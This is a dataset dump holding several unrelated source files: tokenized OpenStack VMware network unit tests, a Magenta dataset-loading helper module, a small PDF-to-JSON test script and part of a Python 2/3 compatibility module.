newline|'\n'
nl|'\n'
DECL|member|test_create_port_group_already_exists
dedent|''
name|'def'
name|'test_create_port_group_already_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'AddPortGroup'"
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'vexc'
op|'.'
name|'AlreadyExistsException'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_add_vswitch_port_group_spec'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_host_ref'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_add_vswitch'
op|','
name|'_get_host'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_util'
op|'.'
name|'create_port_group'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'pg_name'"
op|','
nl|'\n'
string|"'vswitch_name'"
op|','
name|'vlan_id'
op|'='
number|'0'
op|','
nl|'\n'
name|'cluster'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_port_group_exception
dedent|''
dedent|''
name|'def'
name|'test_create_port_group_exception'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'AddPortGroup'"
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_add_vswitch_port_group_spec'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_host_ref'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_add_vswitch'
op|','
name|'_get_host'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|','
nl|'\n'
name|'network_util'
op|'.'
name|'create_port_group'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'pg_name'"
op|','
nl|'\n'
string|"'vswitch_name'"
op|','
name|'vlan_id'
op|'='
number|'0'
op|','
nl|'\n'
name|'cluster'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vif_info_none
dedent|''
dedent|''
name|'def'
name|'test_get_vif_info_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'vif'
op|'.'
name|'get_vif_info'
op|'('
string|"'fake_session'"
op|','
string|"'fake_cluster'"
op|','
nl|'\n'
string|"'is_neutron'"
op|','
string|"'fake_model'"
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vif_info_empty_list
dedent|''
name|'def'
name|'test_get_vif_info_empty_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'vif'
op|'.'
name|'get_vif_info'
op|'('
string|"'fake_session'"
op|','
string|"'fake_cluster'"
op|','
nl|'\n'
string|"'is_neutron'"
op|','
string|"'fake_model'"
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'get_network_ref'"
op|','
name|'return_value'
op|'='
string|"'fake_ref'"
op|')'
newline|'\n'
DECL|member|test_get_vif_info
name|'def'
name|'test_get_vif_info'
op|'('
name|'self'
op|','
name|'mock_get_network_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_info'
op|'='
name|'utils'
op|'.'
name|'get_test_network_info'
op|'('
op|')'
newline|'\n'
name|'vif_info'
op|'='
name|'vif'
op|'.'
name|'get_vif_info'
op|'('
string|"'fake_session'"
op|','
string|"'fake_cluster'"
op|','
nl|'\n'
string|"'is_neutron'"
op|','
string|"'fake_model'"
op|','
name|'network_info'
op|')'
newline|'\n'
name|'expected'
op|'='
op|'['
op|'{'
string|"'iface_id'"
op|':'
name|'utils'
op|'.'
name|'FAKE_VIF_UUID'
op|','
nl|'\n'
string|"'mac_address'"
op|':'
name|'utils'
op|'.'
name|'FAKE_VIF_MAC'
op|','
nl|'\n'
string|"'network_name'"
op|':'
name|'utils'
op|'.'
name|'FAKE_NETWORK_BRIDGE'
op|','
nl|'\n'
string|"'network_ref'"
op|':'
string|"'fake_ref'"
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'fake_model'"
op|'}'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'_check_ovs_supported_version'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_ovs_integration_bridge
name|'def'
name|'test_get_neutron_network_ovs_integration_bridge'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_check'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'integration_bridge'
op|'='
string|"'fake-bridge-id'"
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_OVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'expected_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-bridge-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'opaque'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'False'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_ref'
op|','
name|'network_ref'
op|')'
newline|'\n'
name|'mock_check'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'_check_ovs_supported_version'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_ovs
name|'def'
name|'test_get_neutron_network_ovs'
op|'('
name|'self'
op|','
name|'mock_check'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_OVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'expected_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_ref'
op|','
name|'network_ref'
op|')'
newline|'\n'
name|'mock_check'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|','
string|"'_check_ovs_supported_version'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_ovs_logical_switch_id
name|'def'
name|'test_get_neutron_network_ovs_logical_switch_id'
op|'('
name|'self'
op|','
name|'mock_check'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_OVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|','
nl|'\n'
name|'details'
op|'='
op|'{'
string|"'nsx-logical-switch-id'"
op|':'
nl|'\n'
string|"'fake-nsx-id'"
op|'}'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'expected_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-nsx-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_ref'
op|','
name|'network_ref'
op|')'
newline|'\n'
name|'mock_check'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_dvs
name|'def'
name|'test_get_neutron_network_dvs'
op|'('
name|'self'
op|','
name|'mock_network_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_network_obj'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-key'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-props'"
op|'}'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'return_value'
op|'='
name|'fake_network_obj'
newline|'\n'
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_DVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fa0'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'fake_network_obj'
op|','
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_dvs_vif_details
name|'def'
name|'test_get_neutron_network_dvs_vif_details'
op|'('
name|'self'
op|','
name|'mock_network_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_network_obj'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'pg1'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-props'"
op|'}'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'return_value'
op|'='
name|'fake_network_obj'
newline|'\n'
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_DVS'
op|','
nl|'\n'
name|'details'
op|'='
op|'{'
string|"'dvs_port_key'"
op|':'
string|"'key1'"
op|','
nl|'\n'
string|"'dvs_port_group_name'"
op|':'
string|"'pg1'"
op|'}'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'network_ref'
op|'='
name|'vif'
op|'.'
name|'_get_neutron_network'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
name|'mock_network_name'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-session'"
op|','
nl|'\n'
string|"'pg1'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'fake_network_obj'
op|','
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'None'
op|')'
newline|'\n'
DECL|member|test_get_neutron_network_dvs_no_match
name|'def'
name|'test_get_neutron_network_dvs_no_match'
op|'('
name|'self'
op|','
name|'mock_network_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'type'
op|'='
name|'network_model'
op|'.'
name|'VIF_TYPE_DVS'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NetworkNotFoundForBridge'
op|','
nl|'\n'
name|'vif'
op|'.'
name|'_get_neutron_network'
op|','
nl|'\n'
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_neutron_network_invalid_type
dedent|''
name|'def'
name|'test_get_neutron_network_invalid_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'self'
op|'.'
name|'_network'
op|')'
op|']'
nl|'\n'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
nl|'\n'
name|'vif'
op|'.'
name|'_get_neutron_network'
op|','
nl|'\n'
string|"'fake-session'"
op|','
nl|'\n'
string|"'fake-cluster'"
op|','
nl|'\n'
name|'vif_info'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vif'
op|'.'
name|'LOG'
op|','
string|"'warning'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vim_util'
op|','
string|"'get_vc_version'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'5.0.0'"
op|')'
newline|'\n'
DECL|member|test_check_invalid_ovs_version
name|'def'
name|'test_check_invalid_ovs_version'
op|'('
name|'self'
op|','
name|'mock_version'
op|','
name|'mock_warning'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif'
op|'.'
name|'_check_ovs_supported_version'
op|'('
string|"'fake_session'"
op|')'
newline|'\n'
comment|'# assert that the min version is in a warning message'
nl|'\n'
name|'expected_arg'
op|'='
op|'{'
string|"'version'"
op|':'
name|'constants'
op|'.'
name|'MIN_VC_OVS_VERSION'
op|'}'
newline|'\n'
name|'version_arg_found'
op|'='
name|'False'
newline|'\n'
name|'for'
name|'call'
name|'in'
name|'mock_warning'
op|'.'
name|'call_args_list'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'call'
op|'['
number|'0'
op|']'
op|'['
number|'1'
op|']'
op|'=='
name|'expected_arg'
op|':'
newline|'\n'
indent|' '
name|'version_arg_found'
op|'='
name|'True'
newline|'\n'
name|'break'
newline|'\n'
dedent|''
dedent|''
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'version_arg_found'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| [
"[email protected]"
] | |
8688f0f01915077265c19b58b0e1101afbd6b545 | 6bf7c633f31b2c7c222f160b5526bde5fa734690 | /magenta/models/latent_transfer/common.py | 4f8028201667b166e47fec00669c1c5d5f950408 | [
"Apache-2.0"
] | permissive | dax-1895/magenta | 04fb27f15fdfd7452980858c364dae46bd861c35 | 4393c218147e92d805bbe85fddebd3397c766715 | refs/heads/master | 2020-04-03T22:29:31.388322 | 2018-10-31T03:39:54 | 2018-10-31T03:39:54 | 155,604,293 | 0 | 1 | Apache-2.0 | 2018-10-31T18:18:48 | 2018-10-31T18:18:47 | null | UTF-8 | Python | false | false | 8,387 | py | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common functions/helpers for dataspace model.
This library contains many common functions and helpers used to for the
dataspace model (defined in `train_dataspace.py`) that is used in training
(`train_dataspace.py` and `train_dataspace_classifier.py`), sampling
(`sample_dataspace.py`) and encoding (`encode_dataspace.py`).
These components are classified in the following categories:
- Loading helper that makes dealing with config / dataset easier. This
includes:
`get_model_uid`, `load_config`, `dataset_is_mnist_family`,
`load_dataset`, `get_index_grouped_by_label`.
- Helper making dumping dataspace data easier. This includes:
`batch_image`, `save_image`, `make_grid`, `post_proc`
- Miscellaneous Helpers, including
`get_default_scratch`, `ObjectBlob`,
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import importlib
import os
import numpy as np
from PIL import Image
import tensorflow as tf
from magenta.models.latent_transfer import local_mnist
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string(
'default_scratch', '/tmp/', 'The default root directory for scratching. '
'It can contain \'~\' which would be handled correctly.')
def get_default_scratch():
"""Get the default directory for scratching."""
return os.path.expanduser(FLAGS.default_scratch)
class ObjectBlob(object):
"""Helper object storing key-value pairs as attributes."""
def __init__(self, **kwargs):
for k, v in kwargs.items():
self.__dict__[k] = v
def get_model_uid(config_name, exp_uid):
"""Helper function returning model's uid."""
return config_name + exp_uid
def load_config(config_name):
"""Load config from corresponding configs.<config_name> module."""
return importlib.import_module('configs.%s' % config_name).config
def _load_celeba(data_path, postfix):
"""Load the CelebA dataset."""
with tf.gfile.Open(os.path.join(data_path, 'train' + postfix), 'rb') as f:
train_data = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'eval' + postfix), 'rb') as f:
eval_data = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'test' + postfix), 'rb') as f:
test_data = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'attr_train.npy'), 'rb') as f:
attr_train = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'attr_eval.npy'), 'rb') as f:
attr_eval = np.load(f)
with tf.gfile.Open(os.path.join(data_path, 'attr_test.npy'), 'rb') as f:
attr_test = np.load(f)
attr_mask = [4, 8, 9, 11, 15, 20, 24, 31, 35, 39]
attribute_names = [
'Bald',
'Black_Hair',
'Blond_Hair',
'Brown_Hair',
'Eyeglasses',
'Male',
'No_Beard',
'Smiling',
'Wearing_Hat',
'Young',
]
attr_train = attr_train[:, attr_mask]
attr_eval = attr_eval[:, attr_mask]
attr_test = attr_test[:, attr_mask]
return (train_data, eval_data, test_data, attr_train, attr_eval, attr_test,
attribute_names)
def dataset_is_mnist_family(dataset):
"""returns if dataset is of MNIST family."""
return dataset.lower() == 'mnist' or dataset.lower() == 'fashion-mnist'
def load_dataset(config):
"""Load dataset following instruction in `config`."""
if dataset_is_mnist_family(config['dataset']):
crop_width = config.get('crop_width', None) # unused
img_width = config.get('img_width', None) # unused
scratch = config.get('scratch', get_default_scratch())
basepath = os.path.join(scratch, config['dataset'].lower())
data_path = os.path.join(basepath, 'data')
save_path = os.path.join(basepath, 'ckpts')
tf.gfile.MakeDirs(data_path)
tf.gfile.MakeDirs(save_path)
# black-on-white MNIST (harder to learn than white-on-black MNIST)
# Running locally (pre-download data locally)
mnist_train, mnist_eval, mnist_test = local_mnist.read_data_sets(
data_path, one_hot=True)
train_data = np.concatenate([mnist_train.images, mnist_eval.images], axis=0)
attr_train = np.concatenate([mnist_train.labels, mnist_eval.labels], axis=0)
eval_data = mnist_test.images
attr_eval = mnist_test.labels
attribute_names = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
elif config['dataset'] == 'CELEBA':
crop_width = config['crop_width']
img_width = config['img_width']
postfix = '_crop_%d_res_%d.npy' % (crop_width, img_width)
# Load Data
scratch = config.get('scratch', get_default_scratch())
basepath = os.path.join(scratch, 'celeba')
data_path = os.path.join(basepath, 'data')
save_path = os.path.join(basepath, 'ckpts')
(train_data, eval_data, _, attr_train, attr_eval, _,
attribute_names) = _load_celeba(data_path, postfix)
else:
raise NotImplementedError
return ObjectBlob(
crop_width=crop_width,
img_width=img_width,
basepath=basepath,
data_path=data_path,
save_path=save_path,
train_data=train_data,
attr_train=attr_train,
eval_data=eval_data,
attr_eval=attr_eval,
attribute_names=attribute_names,
)
def get_index_grouped_by_label(label):
"""Get (an array of) index grouped by label.
This array is used for label-level sampling.
It aims at MNIST and CelebA (in Jesse et al. 2018) with 10 labels.
Args:
label: a list of labels in integer.
Returns:
A (# label - sized) list of lists contatining indices of that label.
"""
index_grouped_by_label = [[] for _ in range(10)]
for i, label in enumerate(label):
index_grouped_by_label[label].append(i)
return index_grouped_by_label
def batch_image(b, max_images=64, rows=None, cols=None):
"""Turn a batch of images into a single image mosaic."""
mb = min(b.shape[0], max_images)
if rows is None:
rows = int(np.ceil(np.sqrt(mb)))
cols = rows
diff = rows * cols - mb
b = np.vstack([b[:mb], np.zeros([diff, b.shape[1], b.shape[2], b.shape[3]])])
tmp = b.reshape(-1, cols * b.shape[1], b.shape[2], b.shape[3])
img = np.hstack(tmp[i] for i in range(rows))
return img
def save_image(img, filepath):
"""Save an image to filepath.
It assumes `img` is a float numpy array with value in [0, 1]
Args:
img: a float numpy array with value in [0, 1] representing the image.
filepath: a string of file path.
"""
img = np.maximum(0, np.minimum(1, img))
im = Image.fromarray(np.uint8(img * 255))
im.save(filepath)
def make_grid(boundary=2.0, number_grid=50, dim_latent=2):
"""Helper function making 1D or 2D grid for evaluation purpose."""
zs = np.linspace(-boundary, boundary, number_grid)
z_grid = []
if dim_latent == 1:
for x in range(number_grid):
z_grid.append([zs[x]])
dim_grid = 1
else:
for x in range(number_grid):
for y in range(number_grid):
z_grid.append([0.] * (dim_latent - 2) + [zs[x], zs[y]])
dim_grid = 2
z_grid = np.array(z_grid)
return ObjectBlob(z_grid=z_grid, dim_grid=dim_grid)
def make_batch_image_grid(dim_grid, number_grid):
"""Returns a patched `make_grid` function for grid."""
assert dim_grid in (1, 2)
if dim_grid == 1:
batch_image_grid = partial(
batch_image,
max_images=number_grid,
rows=1,
cols=number_grid,
)
else:
batch_image_grid = partial(
batch_image,
max_images=number_grid * number_grid,
rows=number_grid,
cols=number_grid,
)
return batch_image_grid
def post_proc(img, config):
"""Post process image `img` according to the dataset in `config`."""
x = img
x = np.minimum(1., np.maximum(0., x)) # clipping
if dataset_is_mnist_family(config['dataset']):
x = np.reshape(x, (-1, 28, 28))
x = np.stack((x,) * 3, -1) # grey -> rgb
return x
| [
"[email protected]"
] | |
8164c15ce080bba486b0e97395893638e109f140 | 673e829dda9583c8dd2ac8d958ba1dc304bffeaf | /data/multilingual/Latn.QVA/Sun-ExtA_16/pdf_to_json_test_Latn.QVA_Sun-ExtA_16.py | c9e6eeadc61bf0cfc64ae23cd016123070abc397 | [
"BSD-3-Clause"
] | permissive | antoinecarme/pdf_to_json_tests | 58bab9f6ba263531e69f793233ddc4d33b783b7e | d57a024fde862e698d916a1178f285883d7a3b2f | refs/heads/master | 2021-01-26T08:41:47.327804 | 2020-02-27T15:54:48 | 2020-02-27T15:54:48 | 243,359,934 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.QVA/Sun-ExtA_16/udhr_Latn.QVA_Sun-ExtA_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| [
"[email protected]"
] | |
310ef3f7f502ac9fca2d6fc43f37500bd8a533f7 | 3e4c3b6a6ba770fa18e9f072b1cfb58207f96b30 | /openaddr/compat.py | ec93ded08da55c579f23fc715124f0d6f8c05740 | [
"ISC"
] | permissive | cbmeeks/machine | 931b53657db3bb0b960006ccc6abd67fd41d704a | 39652f0614597e2b56973ded9f61a1a2a208da2e | refs/heads/master | 2020-12-26T00:46:01.112727 | 2016-07-31T03:41:06 | 2016-07-31T03:41:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,599 | py | import sys
import io
PY2 = (sys.version_info[0] == 2)
if PY2:
import unicodecsv, subprocess32, uritemplate
unicodecsv.field_size_limit(sys.maxsize)
check_output = subprocess32.check_output
CalledProcessError = subprocess32.CalledProcessError
TimeoutExpired = subprocess32.TimeoutExpired
csvIO = io.BytesIO
def csvreader(file, encoding=None, **kwargs):
''' Pass encoding to unicodecsv
'''
if encoding is not None:
kwargs['encoding'] = encoding
if 'delimiter' in kwargs:
kwargs['delimiter'] = str(kwargs['delimiter'])
return unicodecsv.reader(file, **kwargs)
def csvwriter(file, encoding=None, **kwargs):
''' Pass encoding to unicodecsv
'''
if encoding is not None:
kwargs['encoding'] = encoding
return unicodecsv.writer(file, **kwargs)
def csvDictReader(file, encoding=None, delimiter=None, **kwargs):
''' Pass encoding to unicodecsv
'''
# Python2 unicodecsv requires this be not unicode
if delimiter is not None:
kwargs['delimiter'] = delimiter.encode('ascii')
if encoding is not None:
kwargs['encoding'] = encoding
return unicodecsv.DictReader(file, **kwargs)
